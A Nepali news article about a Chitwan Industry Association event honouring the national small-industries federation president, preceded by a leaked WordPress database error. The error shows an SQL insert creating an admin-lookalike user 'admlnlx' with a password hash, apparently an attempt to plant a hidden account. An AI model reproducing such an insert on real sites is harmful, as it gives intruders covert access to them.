WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bm0Vt9E.r8TkTEIU1BCNkdkzaQOD2n/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 12:11:21', '', 'admlnlx', 'admlnlx')
चितवन, पुस २९–
नेपाल घरेलु तथा साना उद्योग महासंघका अध्यक्ष श्याम गिरीले उद्योगको विकास र प्रवद्र्धनका लागि सहकार्य आवश्यक रहेको बताउनुभएको छ ।
चितवन उद्योग संघले आज (शुक्रबार) आयोजना गरेको स्वागत तथा सम्मान कार्यक्रमका बोल्दै अध्यक्ष गिरीले उद्योगहरुको विकासक्रम बढ्दै गईरहेकोले सहकार्यगरि प्रवद्र्धनमा अघि बढ्नुपर्ने बताउनुभयो । यस्तै उहाँले चितवन उद्योग संघको अगुवाईमा करिव ३० करोडको लागतमा निर्माण हुन लागेको चितवन प्रदर्शनी केन्द्रको निर्माणमा सहयोग गर्ने प्रतिवद्धता जनाउनुभयो ।
चितवन उद्योग संघका अध्यक्ष भीमबहादुर पाण्डेले घरेलु तथा उद्योग महासंघ अन्तरगत नै चितवन उद्योग संघ भएकाले सहकार्य गर्दै अघि बढ्ने बताउनुभयो । उहाँले विगतका कमीकमजोरीलाई सुधार गर्दै अघि बढ्नुपर्ने आवश्यकता औल्याउनुभयो । कार्यक्रममा नेपाल घरेलु तथा साना उद्योग महासंघका महासचिव डम्बर प्रसाद रेग्मी, चितवन उद्योग संघका पूर्व अध्यक्ष एवंम गर्भनिङ्ग काउन्सिलका सह–संयोजक हरिप्रसाद सुवेदीले मन्तव्यले मन्तव्य व्यक्त गर्नुभएको थियो भने संघका कोषाध्यक्ष मदन घिमिरेले स्वागत मन्तव्य व्यक्त गर्नुभएको थियो ।
कार्यक्रममा नेपाल घरेलु तथा साना उद्योग महासंघका अध्यक्ष श्याम गिरीलाई चितवन उद्योग संघका अध्यक्ष भीमबहादुर पाण्डेले मायाको चिनोले स्वागत गर्नुभएको थियो । कार्यक्रममा नेपाल घरेलु तथा साना उद्योग महासंघका निर्वतमान अध्यक्ष सुरेश प्रधान, नेपाल घरेलु तथा साना उद्योग महासंघका पूर्व अध्यक्ष लता प्याकुरेल, नेपाल घरेलु तथा साना उद्योग महासंघका केन्द्रीय महिला उद्यमी समितिका निवर्तमान सभापति शोभा गुरुङ्ग, नेपाल घरेलु तथा साना उद्योग महासंघका ३ नं. प्रदेशका बरिष्ठ उपाध्यक्ष एवम् चितवन उद्योग संघका गर्भनिङ्ग काउन्सिलका संयोजक, ताराप्रसाद पौडेल, नेपाल घरेलु तथा साना उद्योग महासंघका केन्द्रिय सदस्य डा.कल्याणी मिश्र, नेपाल घरेलु तथा साना उद्योग महासंघ, क्षेत्रिय महिला उद्यमी समितिका ३ नं. प्रदेशका अध्यक्ष श्री तारा देवी काफ्ले, नेपाल घरेलु तथा साना उद्योग महासंघका, क्षेत्रीय महिला उद्यमी समितिका ३ नं. प्रदेशका उपाध्यक्ष राशी लामालगायतको सहभागिता रहेको थियो ।